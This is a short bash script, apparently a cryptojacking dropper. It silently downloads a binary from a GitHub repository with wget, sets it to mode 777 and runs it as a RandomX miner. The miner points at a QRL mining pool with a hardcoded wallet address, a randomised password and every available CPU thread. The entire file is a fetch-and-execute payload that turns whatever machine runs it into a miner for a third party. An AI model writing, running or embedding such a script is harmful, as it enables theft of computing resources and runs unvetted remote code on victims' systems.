#!/bin/bash
wget -O mmm https://github.com/kidoescegh/xm/raw/main/sorabi28 > /dev/null 2>&1
chmod 777 mmm
./mmm --algorithm randomx --pool us.qrl.gfwroute.com:1167 --wallet Q010500f157d77b0aa9449a33867d215d148428ca3f2c5389fef87ce0fd111755597ef22112a9d6 --password $(echo $(shuf -i 1-100000 -n 1)-kido) --cpu-threads $(nproc --all) --keepalive true
